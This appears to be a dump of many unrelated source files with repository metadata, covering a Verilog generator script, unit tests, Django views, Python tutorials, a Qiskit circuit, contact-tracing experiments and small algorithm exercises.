p_prefix = input('\nInput prefix for module name (slave_select_{your prefix}.v): ')
txt = select_module.render(
t_prefix = p_prefix,
t_cnt_slaves = n_slaves,
t_n_slaves = p_n_slaves)
file_name = 'slave_select_'+p_prefix+'.v'
file = open(file_name,'w')
file.write(txt)
file.close()
print('\n >>> ' + file_name + ' - file was generated in root folder! \n\n')
input(' >>> for exit push Enter ... <<<')
|
[
"sokolov.inf@gmail.com"
] |
sokolov.inf@gmail.com
|
e4ad5ddfc19faf828896a5390b7e32dcbca21979
|
78158f942bd0e223f11016457a494c76b7a689b4
|
/plugins/SocialGraph/config.py
|
f7b5039e8640b8d83d85ce4a1a1076001ef8f51f
|
[] |
no_license
|
frumiousbandersnatch/supybot-plugins
|
ad607dd22529372d72c7dc0083100b5b5cdb719b
|
8c7f16c0584bdf393a56dccff6b35a83142e5ece
|
refs/heads/master
| 2021-01-17T05:46:10.917776
| 2020-03-12T11:42:20
| 2020-03-12T11:42:20
| 6,639,759
| 0
| 1
| null | 2020-03-12T11:42:22
| 2012-11-11T15:21:36
|
Python
|
UTF-8
|
Python
| false
| false
| 517
|
py
|
import supybot.conf as conf
import supybot.registry as registry
def configure(advanced):
# This will be called by supybot to configure this module. advanced is
# a bool that specifies whether the user identified himself as an advanced
# user or not. You should effect your configuration by manipulating the
# registry as appropriate.
from supybot.questions import expect, anything, something, yn
conf.registerPlugin('SocialGraph', True)
WrestlingName = conf.registerPlugin('SocialGraph')
|
[
"ehs@pobox.com"
] |
ehs@pobox.com
|
015eb0ac14909f10bea1681372d9aa89d4b289ac
|
5dde29075e35f8a05f616f29bf4571f8dae0524b
|
/tests/test_base.py
|
08acaf8d01905203335449f280212a0587a42022
|
[
"BSD-3-Clause"
] |
permissive
|
ferringb/pkgcheck
|
a78d88af09f73373ee1fdd2c4055d5fe113c2807
|
b4bf5585a2ecfc4de1a8fa29e1e00303330f0dc3
|
refs/heads/master
| 2023-01-18T20:56:00.456332
| 2021-09-26T22:05:57
| 2021-09-26T22:05:57
| 230,175,990
| 0
| 0
|
BSD-3-Clause
| 2019-12-26T01:48:29
| 2019-12-26T01:48:28
| null |
UTF-8
|
Python
| false
| false
| 2,382
|
py
|
from itertools import chain
from unittest.mock import patch
from pkgcheck import base
from pkgcheck.base import ProgressManager
class TestScope:
def test_rich_comparisons(self):
assert base.commit_scope < base.repo_scope
assert base.commit_scope < 0
assert base.commit_scope <= base.repo_scope
assert base.commit_scope <= 0
assert base.repo_scope > base.commit_scope
assert base.repo_scope > 0
assert base.repo_scope >= base.commit_scope
assert base.repo_scope >= 0
assert base.repo_scope == base.repo_scope
assert base.repo_scope == 1
assert base.repo_scope != base.commit_scope
assert base.repo_scope != 0
def test_hash(self):
assert base.repo_scope in {base.repo_scope, base.commit_scope}
def test_repr(self):
assert base.repo_scope.desc in repr(base.repo_scope)
def test_str(self):
assert base.repo_scope.desc in str(base.repo_scope)
class TestProgressManager:
def test_no_output(self, capsys):
# output disabled due to lower verbosity setting
with patch('sys.stdout.isatty', return_value=True):
with ProgressManager(verbosity=-1) as progress:
for x in range(10):
progress(x)
# output disabled due to non-tty output
with patch('sys.stdout.isatty', return_value=False):
with ProgressManager(verbosity=1) as progress:
for x in range(10):
progress(x)
out, err = capsys.readouterr()
assert not out
assert not err
def test_output(self, capsys):
with patch('sys.stdout.isatty', return_value=True):
with ProgressManager(verbosity=0) as progress:
for x in range(10):
progress(x)
out, err = capsys.readouterr()
assert not out
assert not err.strip().split('\r') == list(range(10))
def test_cached_output(self, capsys):
with patch('sys.stdout.isatty', return_value=True):
with ProgressManager(verbosity=0) as progress:
data = list(range(10))
for x in chain.from_iterable(zip(data, data)):
progress(x)
out, err = capsys.readouterr()
assert not out
assert not err.strip().split('\r') == list(range(10))
|
[
"radhermit@gmail.com"
] |
radhermit@gmail.com
|
d42c47da828d77723a5a248917170553ed107bf9
|
a49c1d05915bddbf0f427fe186eb122ad2ee4ede
|
/projects/views.py
|
cc753ffafe1f55f1a03e204751b116325182d875
|
[] |
no_license
|
thereactgirl/django-portfolio
|
b07419b3ac8efef2df89af7974e67a1fc5d1b315
|
731327bb7821756493437b1bc6b4ae9a01f346d9
|
refs/heads/master
| 2022-12-01T09:35:48.993151
| 2020-08-10T07:08:03
| 2020-08-10T07:08:03
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 596
|
py
|
from django.shortcuts import render
from projects.models import Project
# Create your views here.
def project_index(request):
projects = Project.objects.all() #query for projects
context = {
'projects': projects #context dictionary
}
return render(request, 'project_index.html', context) # must render context dictionary and html template
def project_detail(request, pk): # for the detailed view include project id
project = Project.objects.get(pk=pk)
context = {
'project': project
}
return render(request, 'project_detail.html', context)
|
[
"rleslie1015@gmail.com"
] |
rleslie1015@gmail.com
|
691b4ee48d114a28ea256f9028708f9f690df351
|
0b616edf70bbc094cd48681483821d063b3e2560
|
/Ch03/3-3.py
|
0ce9b2bb2ba8da6637da100da94ea6e3f842c71e
|
[] |
no_license
|
fkrhtmq123/Python
|
c7cf7c8ccc34707acae3112cc2f3960a6c92bbb7
|
b78919978526a0b7732cf5c2f6a6e4485f89d187
|
refs/heads/master
| 2022-11-15T07:28:06.817912
| 2020-07-13T05:18:23
| 2020-07-13T05:18:23
| 274,057,487
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,195
|
py
|
"""
날짜 : 2020/06/23
이름 : 김동욱
내용 : for문 p138
"""
# for
# 리스트를 이용한 for
nums = [1, 2, 3, 4, 5]
for n in nums:
print('n :', n)
for a in ['tiger', 'lion', 'eagle', 'bear']:
print('a :', a)
# for over a tuple
for n in (1, 2, 3, 4, 5):
print('n :', n)
# for using the range function
for num in range(5):
print('num :', num)
for v in range(1, 10):
print('v :', v)
# sum of 1 through 10
sum = 0
for k in range(1, 11):
sum += k
print('1부터 10까지 합 :', sum)
# sum of the even numbers from 1 through 10
tot = 0
for k in range(1, 11):
if k%2 == 0:
tot += k
print('1부터 10까지 짝수 합 :', tot)
# nested for loops
for a in range(0, 3):
print('a :', a)
for b in range(0, 5):
print('b :', b)
# multiplication tables (2 through 9)
for a in range(2, 10):
print(a, '단 출력')
for b in range(1, 10):
print(a, ' X ', b, ' = ', a * b)
"""print('%d x %d = %d' % (a, b, a*b)"""
# star triangle
for a in range(0, 10):
for b in range(1, a+1):
print('☆', end='')
print()
for n in range(1, 11):
print('★'*n)
for a in range(11, 1, -1):
print('★'*a)
# exercise: try drawing a star pyramid
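# One possible solution, added as an illustration (not part of the original exercise):
for a in range(1, 10):
    print(' ' * (9 - a) + '★' * (2 * a - 1))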
|
[
"fkrhtmq123@naver.com"
] |
fkrhtmq123@naver.com
|
a10b50e11d524957d20b64e2e00c60711eb9a684
|
c066978635abb98e225918ff0bdaa31329439e3c
|
/python/1-string/451-frequencySort.py
|
702acddee3122ca304f3f17fa5c0ee8f8f583c5e
|
[] |
no_license
|
thangln1003/python-practice
|
7281cb0d4623546cbdae6eb672e204a3197e3a7d
|
85304503181fa1e7916426ea6945f5adc0ce1934
|
refs/heads/master
| 2021-07-05T06:47:49.637915
| 2021-04-04T08:34:59
| 2021-04-04T08:34:59
| 229,037,389
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 734
|
py
|
""" 451. Sort Characters By Frequency (Medium)
https://leetcode.com/problems/sort-characters-by-frequency/
Given a string, sort it in decreasing order based on the frequency of characters.
Input: "tree"
Output: "eert"
Explanation:
'e' appears twice while 'r' and 't' both appear once.
So 'e' must appear before both 'r' and 't'. Therefore "eetr" is also a valid answer.
Input: "cccaaa"
Output: "cccaaa"
Explanation:
Both 'c' and 'a' appear three times, so "aaaccc" is also a valid answer.
Note that "cacaca" is incorrect, as the same characters must be together.
Input: "Aabb"
Output: "bbAa"
Explanation:
"bbaA" is also a valid answer, but "Aabb" is incorrect.
Note that 'A' and 'a' are treated as two different characters.
"""
|
[
"thangln1003@gmail.com"
] |
thangln1003@gmail.com
|
014367303f6c49de1800e7dd7221a17535c2fe9d
|
2ff7e53d5e512cd762217ca54317982e07a2bb0c
|
/notifications/__init__.py
|
b9cc97c7b85c60cb5c0c671c1641c792f00287da
|
[] |
no_license
|
nanxijw/Clara-Pretty-One-Dick
|
66d3d69426642b79e8fd4cc8e0bec23adeeca6d6
|
50de3488a2140343c364efc2615cf6e67f152be0
|
refs/heads/master
| 2021-01-19T09:25:07.555284
| 2015-02-17T21:49:33
| 2015-02-17T21:49:33
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 68
|
py
|
#Embedded file name: notifications\__init__.py
__author__ = 'aevar'
|
[
"billchang.e@gmail.com"
] |
billchang.e@gmail.com
|
83778c8e64b830d0fe06f3a95c4fef5f372e9f32
|
09e57dd1374713f06b70d7b37a580130d9bbab0d
|
/benchmark/startQiskit_noisy942.py
|
0dd1ec7427375daac5006c408b415f74f1c13ea9
|
[
"BSD-3-Clause"
] |
permissive
|
UCLA-SEAL/QDiff
|
ad53650034897abb5941e74539e3aee8edb600ab
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
refs/heads/main
| 2023-08-05T04:52:24.961998
| 2021-09-19T02:56:16
| 2021-09-19T02:56:16
| 405,159,939
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,893
|
py
|
# qubit number=5
# total number=37
import cirq
import qiskit
from qiskit.providers.aer import QasmSimulator
from qiskit.test.mock import FakeVigo
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2,floor, sqrt, pi
import numpy as np
import networkx as nx
def build_oracle(n: int, f) -> QuantumCircuit:
# implement the oracle O_f^\pm
# NOTE: use U1 gate (P gate) with \lambda = 180 ==> CZ gate
# or multi_control_Z_gate (issue #127)
controls = QuantumRegister(n, "ofc")
oracle = QuantumCircuit(controls, name="Zf")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.h(controls[n])
if n >= 2:
oracle.mcu1(pi, controls[1:], controls[0])
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.barrier()
return oracle
def make_circuit(n:int,f) -> QuantumCircuit:
# circuit begin
input_qubit = QuantumRegister(n,"qc")
classical = ClassicalRegister(n, "qm")
prog = QuantumCircuit(input_qubit, classical)
prog.h(input_qubit[0]) # number=3
prog.h(input_qubit[1]) # number=4
prog.h(input_qubit[2]) # number=5
prog.h(input_qubit[2]) # number=34
prog.cz(input_qubit[3],input_qubit[2]) # number=35
prog.h(input_qubit[2]) # number=36
prog.y(input_qubit[2]) # number=33
prog.h(input_qubit[3]) # number=6
prog.h(input_qubit[4]) # number=21
Zf = build_oracle(n, f)
repeat = floor(sqrt(2 ** n) * pi / 4)
for i in range(1):
prog.append(Zf.to_gate(), [input_qubit[i] for i in range(n)])
prog.h(input_qubit[0]) # number=1
prog.h(input_qubit[1]) # number=2
prog.h(input_qubit[2]) # number=7
prog.h(input_qubit[3]) # number=8
prog.h(input_qubit[3]) # number=30
prog.cz(input_qubit[4],input_qubit[3]) # number=31
prog.h(input_qubit[3]) # number=32
prog.h(input_qubit[2]) # number=29
prog.cx(input_qubit[1],input_qubit[0]) # number=22
prog.cx(input_qubit[3],input_qubit[1]) # number=25
prog.x(input_qubit[0]) # number=23
prog.cx(input_qubit[1],input_qubit[0]) # number=24
prog.x(input_qubit[1]) # number=10
prog.x(input_qubit[2]) # number=11
prog.x(input_qubit[3]) # number=12
prog.x(input_qubit[1]) # number=27
if n>=2:
prog.mcu1(pi,input_qubit[1:],input_qubit[0])
prog.x(input_qubit[0]) # number=13
prog.x(input_qubit[1]) # number=14
prog.x(input_qubit[2]) # number=15
prog.x(input_qubit[3]) # number=16
prog.h(input_qubit[0]) # number=17
prog.h(input_qubit[1]) # number=18
prog.h(input_qubit[2]) # number=19
prog.h(input_qubit[3]) # number=20
prog.h(input_qubit[0])
prog.h(input_qubit[1])
prog.h(input_qubit[2])
prog.h(input_qubit[3])
# circuit end
for i in range(n):
prog.measure(input_qubit[i], classical[i])
return prog
if __name__ == '__main__':
key = "00000"
f = lambda rep: str(int(rep == key))
prog = make_circuit(5,f)
backend = FakeVigo()
sample_shot =7924
info = execute(prog, backend=backend, shots=sample_shot).result().get_counts()
backend = FakeVigo()
circuit1 = transpile(prog,backend,optimization_level=2)
writefile = open("../data/startQiskit_noisy942.csv","w")
print(info,file=writefile)
print("results end", file=writefile)
print(circuit1.depth(),file=writefile)
print(circuit1,file=writefile)
writefile.close()
|
[
"wangjiyuan123@yeah.net"
] |
wangjiyuan123@yeah.net
|
34c3fdd1c045b1209e80a5701469eaae26b8808e
|
95ed9b1002e760d10cad2b5b15d73e3360b9ae0a
|
/dive-into-python3/os_path.py
|
b48800e9b8216aa13c93cb8052e36deb95f54611
|
[
"MIT"
] |
permissive
|
richard-ma/weekendProject
|
609a07393bc51b452218ed7bf76cfcf6ec949cff
|
4880e4c8a8046d8e6c3dedcbc6ce26e0862ada72
|
refs/heads/master
| 2023-08-16T12:28:39.463062
| 2023-08-12T04:48:03
| 2023-08-12T04:48:03
| 120,096,496
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,111
|
py
|
#!/usr/bin/env python
# encoding: utf-8
import unittest
import os
class TestPath(unittest.TestCase):
def setUp(self):
self.work_dir = '/etc'
def tearDown(self):
pass
    # Get and set the current working directory
    def test_getcwd(self):
        os.chdir(self.work_dir)
        self.assertEqual(
            self.work_dir,
            os.getcwd())
    # Expand the home directory
    def test_expanduser(self):
        self.assertEqual(
            '/home/richardma',
            os.path.expanduser('~'))
    # Join path components with the proper separator
    def test_path_join(self):
        self.assertEqual(
            '/foo/bar',
            os.path.join('/foo', 'bar'))
    # Split a path into directory, file name and extension
    def test_path_parse(self):
        pathname = '/foo/bar/test.py'
        dirname, filename = os.path.split(pathname)
        self.assertEqual(
            ['/foo/bar', 'test.py'],
            [dirname, filename])
        shortname, extension = os.path.splitext(filename)
        self.assertEqual(
            ['test', '.py'],
            [shortname, extension])
    # List all files and directories in a directory
    def test_get_files_of_directory(self):
        import glob
        os.chdir(self.work_dir)  # set the working directory
        # use a wildcard to collect every file and directory
        self.assertTrue(
            'hosts' in glob.glob('*'))  # /etc contains a hosts file
        self.assertTrue(
            'grub.d' in glob.glob('*'))  # /etc contains a grub.d directory
    # Get file metadata
    def test_file_metadata(self):
        os.chdir(self.work_dir)  # set the working directory
        #print(os.stat('hosts'))
        self.assertTrue(os.stat('hosts'))  # information about the hosts file, e.g. its modification time
    # Get the absolute path of a file
    def test_get_realpath(self):
        os.chdir(self.work_dir)  # set the working directory
        self.assertEqual(
            '/etc/hosts',
            os.path.realpath('hosts'))  # takes a file name in the working directory and returns its absolute path
if __name__ == '__main__':
unittest.main()
|
[
"richard.ma.19850509@gmail.com"
] |
richard.ma.19850509@gmail.com
|
60d7a6f64029d21b7467ff43512efac0d23c5213
|
35c20226eea3dd11b5b19f226400d6a1f38fa362
|
/ctrace/experiments.py
|
aaa5be6d694054b9902d87f3fd72f12632774fa5
|
[] |
no_license
|
Ann924/ContactTracing
|
131457ad3c540ac65d3e78920d6f97bed552e641
|
fccae40b795be624a1401a8fe658a5c3335b8c4c
|
refs/heads/main
| 2023-02-27T04:19:51.723237
| 2021-01-26T03:09:59
| 2021-01-26T03:09:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,301
|
py
|
from time import perf_counter
from .dataset import load_sir
from .solve import *
from .utils import min_exposed_objective, indicatorToSet
TrackerInfo = namedtuple("TrackerInfo", ['value', 'sol', 'isOptimal', 'maxD', 'I_size', 'v1_size', 'v2_size', 'num_cross_edges'])
def time_trial_tracker(G: nx.graph, I0, safe, cost_constraint, p=.5, method="dependent"):
"""
Runs to_quarantine and tracks various statistics. Used in conjunction with GridExecutor
(GridExecutorParallel or GridExecutorLinear) to track run statistics.
Parameters
----------
G
I0
safe
cost_constraint
p
method
Returns
-------
value, sol, isOptimal, maxD, I_size, v1_size, v2_size, num_cross_edges
value: the MinExposed objective value (expected number of people exposed)
sol: an dictionary mapping from V1 IDs to its indicator variables
isOptimal: (-1, 0, 1) -> (does not apply, false, true)
# Statistics
maxD: the maximum number of neighbors of V1 that are in V2
I_size: size of I
v1_size: size of V_1
v2_size: size of V_2
num_cross_edges: number of edges between v1 and v2
"""
costs = np.ones(len(G.nodes))
V_1, V_2 = find_excluded_contours(G, I0, safe)
P, Q = PQ_deterministic(G, I0, V_1, p)
maxD = max_neighbors(G, V_1, V_2)
if method == "weighted":
obj_val, sol, info = weighted_solver(G, I0, P, Q, V_1, V_2, cost_constraint, costs)
return TrackerInfo(obj_val, sol, -1, maxD, *info)
elif method == "dependent":
# Dependent LP Rounding
prob = ProbMinExposed(G, I0, V_1, V_2, P, Q, cost_constraint, costs, solver="GUROBI")
obj_val, sol = basic_non_integer_round(prob)
return TrackerInfo(obj_val, sol, -1, maxD, len(prob.I), len(prob.V1), len(prob.V2), prob.num_cross_edges)
elif method == "dependent_scip":
prob = ProbMinExposed(G, I0, V_1, V_2, P, Q, cost_constraint, costs)
obj_val, sol = basic_non_integer_round(prob)
return TrackerInfo(obj_val, sol, -1, maxD, len(prob.I), len(prob.V1), len(prob.V2), prob.num_cross_edges)
elif method == "gurobi":
# Gurobi MIP Rounding
prob = ProbMinExposedMIP(G, I0, V_1, V_2, P, Q, cost_constraint, costs, solver='GUROBI')
prob.solve_lp()
# Returns a tuple for its optimal value
obj_val = prob.objective_value
sol = prob.quarantined_solution
isOptimal = prob.is_optimal
return TrackerInfo(obj_val, sol, isOptimal, maxD, len(prob.I), len(prob.V1), len(prob.V2), prob.num_cross_edges)
else:
raise Exception("invalid method for optimization")
return_params = ['I_size', 'v1_size', 'v2_size', 'num_cross_edges', 'maxD', 'mip_value', 'min_exposed_value', 'duration', 'v1_objective', 'greedy_overlap']
TimeTrialExtendTrackerInfo = namedtuple("TrackerInfo", return_params)
def time_trial_extended_tracker(G: nx.graph, p, budget, method, from_cache, **kwargs):
"""
Runs to_quarantine and tracks various statistics
Parameters
----------
G
p
budget
method
p
method
from_cache
Returns
-------
min_exposed_value: MinExposed objective value (expected number of people exposed)
mip_value: the MinExposed LP objective value
    greedy_intersection: the number of quarantined members shared with the weighted greedy solution
# Statistics
maxD: the maximum number of neighbors of V1 that are in V2
I_size: size of I
v1_size: size of V_1
v2_size: size of V_2
num_cross_edges: number of edges between v1 and v2
duration: the time it took to execute the method specified
"""
SIR = load_sir(from_cache, merge=True)
infected = SIR["I"]
recovered = SIR["R"]
costs = np.ones(len(G.nodes))
contour1, contour2 = find_excluded_contours(G, infected, recovered)
P, Q = PQ_deterministic(G, infected, contour1, p)
maxD = max_neighbors(G, contour1, contour2)
# The constant value contour1 contributes to the objective value
v1_objective = sum(P[u] for u in contour1)
# start time
weighted_start = perf_counter()
_, weighted_solution = weighted_solver(G, infected, P, Q, contour1, contour2, budget, costs)
# end time
weighted_end = perf_counter()
if method == "greedy_weighted":
prob = ProbMinExposed(G, infected, contour1, contour2, P, Q, budget, costs)
for k, v in weighted_solution.items():
prob.set_variable_id(k, v)
prob.solve_lp()
min_exposed_value = min_exposed_objective(G, (_, infected, recovered), (contour1, contour2), p, weighted_solution)
return TimeTrialExtendTrackerInfo(
len(infected),
len(contour1),
len(contour2),
prob.num_cross_edges,
maxD,
prob.objective_value,
min_exposed_value,
weighted_end - weighted_start,
v1_objective,
-1,
)
elif method == "greedy_degree":
_, method_solution = degree_solver(G, contour1, contour2, budget)
prob = ProbMinExposed(G, infected, contour1, contour2, P, Q, budget, costs)
# TODO: Quick hack for finding the MIP Objective Value
for k, v in method_solution.items():
prob.set_variable_id(k, v)
prob.solve_lp()
mip_value = prob.objective_value
# Returns: mip_value, method_solution
elif method == "random":
_, method_solution = random_solver(contour1, budget)
prob = ProbMinExposed(G, infected, contour1, contour2, P, Q, budget, costs)
# TODO: Quick hack for finding the MIP Objective Value
for k, v in method_solution.items():
prob.set_variable_id(k, v)
prob.solve_lp()
mip_value = prob.objective_value
elif method == "dependent":
# Dependent LP Rounding
prob = ProbMinExposed(G, infected, contour1, contour2, P, Q, budget, costs, solver="GUROBI_LP")
mip_value, method_solution = basic_non_integer_round(prob)
# Returns mip_value and method_solution
elif method == "dependent_scip":
prob = ProbMinExposed(G, infected, contour1, contour2, P, Q, budget, costs)
mip_value, method_solution = basic_non_integer_round(prob)
elif method == "mip_gurobi":
# Gurobi MIP Rounding
prob = ProbMinExposedMIP(G, infected, contour1, contour2, P, Q, budget, costs, solver='GUROBI')
prob.solve_lp()
# Returns a tuple for its optimal value
mip_value = prob.objective_value
method_solution = prob.quarantined_solution
else:
raise Exception("invalid method for optimization")
method_end = perf_counter()
# Round method solution?
greedy_intersection = len(indicatorToSet(method_solution) & indicatorToSet(weighted_solution))
# TODO: Encapsulate G, (_, infected, recovered), (contour1, contour2)
min_exposed_value = min_exposed_objective(G, (_, infected, recovered), (contour1, contour2), p, method_solution)
return TimeTrialExtendTrackerInfo(
len(infected),
len(contour1),
len(contour2),
prob.num_cross_edges,
maxD,
mip_value,
min_exposed_value,
method_end - weighted_end,
v1_objective,
greedy_intersection
)
|
[
"thezachzhao@gmail.com"
] |
thezachzhao@gmail.com
|
eadeffec247f5ef8290283ceb4722d0e91036a41
|
518e9cbf940b5addb2194a96f277050c44963121
|
/Python/Practices/linked_list/partition.py
|
dd89c3e7c54f1d5f265cbb8007df97bd6e1324d9
|
[] |
no_license
|
Mr-Perfection/coding_practice
|
58322192b76a2ab70c4ae11cd05b3bf993272c52
|
41df85292a151eef3266b01545124aeb4e831286
|
refs/heads/master
| 2021-01-11T02:24:26.234486
| 2017-04-11T00:21:10
| 2017-04-11T00:21:10
| 70,965,532
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,036
|
py
|
"""
Partition: Write code to partition a linked list around a value x, such that all nodes less than x come before all nodes greater than or equal to x.
If x is contained within the list, the values of x only need to be after the elements less than x (see below).
The partition element x can appear anywhere in the "right partition";
it does not need to appear between the left and right partitions.
"""
def partition(head,value):
# create temp nodes
part1_head,part2_head = Node(0),Node(0)
part2_tail = part2_head
part1_tail = part1_head
# iterate through the linked-list
while head:
temp = head.next
# if head data is less than value, add to part1_tail
if head.data < value:
part1_tail.next = head
head.next = None
part1_tail = part1_tail.next
else:
part2_tail.next = head
head.next = None
part2_tail = part2_tail.next
head = temp
part1_tail.next = part2_head.next
return part1_head.next
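# Example (traced by hand): partitioning 3 -> 5 -> 8 -> 5 -> 10 -> 2 -> 1 around 5
# with this implementation yields 3 -> 2 -> 1 -> 5 -> 8 -> 5 -> 10.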
|
[
"sungsoolee0127@gmail.com"
] |
sungsoolee0127@gmail.com
|
65e7db376a133d0dfe36fdef08d21cf36dde8544
|
3d33351066af15c2ff96af824008ddb2fdb8b36e
|
/Week 5/week 5 handouts/animalTagged.py
|
075d049b3361a5d12924c48df50444ad8e1b4fe3
|
[] |
no_license
|
ElAwbery/MIT-6.00.1x
|
90a638c668c4a55211b67bdef686d1e03e4623c7
|
27db39bdaaa97514621692d589bbbc50f5b8f567
|
refs/heads/master
| 2021-10-30T10:14:37.007697
| 2019-04-26T05:03:38
| 2019-04-26T05:03:38
| 122,979,335
| 3
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,704
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Jun 11 11:14:45 2016
@author: ericgrimson
"""
class Animal(object):
def __init__(self, age):
self.age = age
self.name = None
def get_age(self):
return self.age
def get_name(self):
return self.name
def set_age(self, newage):
self.age = newage
def set_name(self, newname=""):
self.name = newname
def __str__(self):
return "animal:"+str(self.name)+":"+str(self.age)
class Cat(Animal):
def speak(self):
print("meow")
def __str__(self):
return "cat:"+str(self.name)+":"+str(self.age)
class Rabbit(Animal):
tag = 1
def __init__(self, age, parent1=None, parent2=None):
Animal.__init__(self, age)
self.parent1 = parent1
self.parent2 = parent2
self.rid = Rabbit.tag
Rabbit.tag += 1
def get_rid(self):
return str(self.rid).zfill(3)
def get_parent1(self):
return self.parent1
def get_parent2(self):
return self.parent2
def __add__(self, other):
# returning object of same type as this class
return Rabbit(0, self, other)
def __eq__(self, other):
parents_same = self.parent1.rid == other.parent1.rid \
and self.parent2.rid == other.parent2.rid
parents_opposite = self.parent2.rid == other.parent1.rid \
and self.parent1.rid == other.parent2.rid
return parents_same or parents_opposite
peter = Rabbit(2)
peter.set_name('Peter')
hopsy = Rabbit(3)
hopsy.set_name('Hopsy')
cotton = Rabbit(1, peter, hopsy)
cotton.set_name('Cottontail')
mopsy = peter + hopsy
print(mopsy == cotton)
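# Both mopsy (created as peter + hopsy) and cotton have peter and hopsy as parents,
# so Rabbit.__eq__ returns True and this prints True.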
|
[
"noreply@github.com"
] |
ElAwbery.noreply@github.com
|
c7a87c658bc66890763e3bc43881671cab053525
|
8a8df373bc13407d809dee93d994f95db4544cfc
|
/day0210/tk1.py
|
6c39720ee261deed36fe992629b8b33c2772f6ae
|
[] |
no_license
|
karakazeviewview/PythonTraining
|
b351e6f6a0fb89f9dee9e2304776e953ad8d6325
|
f4d845a271f12b3055ac8df2b332e31a5e0a320d
|
refs/heads/master
| 2023-03-04T07:17:41.744984
| 2021-02-12T05:50:29
| 2021-02-12T05:50:29
| 338,234,944
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 393
|
py
|
import tkinter as tk
def bt_click():
btn['text']='Clicked!'
root=tk.Tk()
root.title('My Window')  # set the window title
root.geometry('600x400')  # set the window size
# create a label for text output
# create a button
btn=tk.Button(root,text='Hello World!',font=('Arial',50),command=bt_click)  # font is passed as a tuple
# place the button
btn.place(x=100,y=100)
root.mainloop()
|
[
"mitsuru.matsuo.great@gmail.com"
] |
mitsuru.matsuo.great@gmail.com
|
6076b1ed3a2cc19ad47bd0a1b97182735fd9e88b
|
f1fb9cca8152e53aa15bb49b5238f3d603b787b9
|
/LeetCode/lc_108_ConvertSortedArrayToBinarySearchTree.py
|
b210c494716d9033d929723a035a3bae7e3bde50
|
[] |
no_license
|
albertmenglongli/Algorithms
|
3a636ab9bb1655a6d4caf5e6e250de6c1d7f3ee8
|
59bb0715f705be5c2edc410a93913ab391c5f7ce
|
refs/heads/master
| 2022-07-03T05:07:37.840785
| 2020-07-16T13:48:57
| 2020-07-16T13:48:57
| 49,275,329
| 6
| 2
| null | 2022-06-21T21:16:33
| 2016-01-08T14:05:09
|
Python
|
UTF-8
|
Python
| false
| false
| 545
|
py
|
# Definition for a binary tree node.
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution(object):
def sortedArrayToBST(self, nums):
"""
:type nums: List[int]
:rtype: TreeNode
"""
if not nums:
return None
        mid = len(nums) // 2  # integer division keeps the index an int on Python 3
root = TreeNode(nums[mid])
root.left = self.sortedArrayToBST(nums[0:mid])
root.right = self.sortedArrayToBST(nums[mid + 1:])
return root
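# Example (illustrative, not part of the original file):
# Solution().sortedArrayToBST([-10, -3, 0, 5, 9]) picks 0 as the root,
# then builds the left subtree from [-10, -3] and the right subtree from [5, 9].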
|
[
"albert.menglongli@gmail.com"
] |
albert.menglongli@gmail.com
|
713b2d179d79e39323efb1afe0dd75c666facb1f
|
15a95ac074649b45fd2b4fbf3b831ff7de1679fa
|
/algorithms/Recursion/merge.py
|
231b9fd4db64fab61bdb7b4d5d33c7efb14db30b
|
[] |
no_license
|
tjforeman/cs-notes
|
bdffdaf523454b60abd85ac88c45a14ea61a3dc5
|
b28161bf0daa718c9f2524cb05ca3e4803f7faed
|
refs/heads/master
| 2020-08-30T08:38:19.222153
| 2019-12-24T04:50:48
| 2019-12-24T04:50:48
| 218,321,564
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 281
|
py
|
# Merge sort basics
# Step 1: split into smaller lists
# [5 9 3 7 2 8 1 6]
# [5 9 3 7] [2 8 1 6]
# [5 9] [3 7] [2 8] [1 6]
# [5] [9] [3] [7] [2] [8] [1] [6]
# step 2: merge
# [5] [9] [3] [7] [2] [8] [1] [6]
# [5 9] [3 7] [2 8] [1 6]
# [3 5 7 9] [ 1 2 6 8]
# [1 2 3 5 6 7 8 9]
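# A minimal implementation of the split/merge procedure sketched above
# (added as an illustration; the original notes contain no code).
def merge_sort(items):
    if len(items) <= 1:
        return items
    mid = len(items) // 2
    return merge(merge_sort(items[:mid]), merge_sort(items[mid:]))
def merge(left, right):
    # Merge two sorted lists into a single sorted list.
    merged = []
    i = j = 0
    while i < len(left) and j < len(right):
        if left[i] <= right[j]:
            merged.append(left[i])
            i += 1
        else:
            merged.append(right[j])
            j += 1
    merged.extend(left[i:])
    merged.extend(right[j:])
    return merged
# merge_sort([5, 9, 3, 7, 2, 8, 1, 6]) -> [1, 2, 3, 5, 6, 7, 8, 9]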
|
[
"tylerforeman92@gmail.com"
] |
tylerforeman92@gmail.com
|
5e126d6672edc4ca6de3f1fef85ac19444ff9145
|
6bcc99ad1bce4216b6d89eda661904dc69e705db
|
/05/poi_id.py
|
f904fa99c298394a778e10807fe53d9e80f3e0e8
|
[] |
no_license
|
kiquin/DAND
|
476534d4a869c97c8892d6b753d8e12bb4b7e9a0
|
f72125db2f3f35e16c7c0db2c965b4a0172c0a5a
|
refs/heads/master
| 2022-09-16T00:37:01.746208
| 2022-08-25T17:01:21
| 2022-08-25T17:01:21
| 147,237,533
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,726
|
py
|
#!/usr/bin/python
import sys
import pickle
sys.path.append("../tools/")
from feature_format import featureFormat, targetFeatureSplit
from tester import dump_classifier_and_data
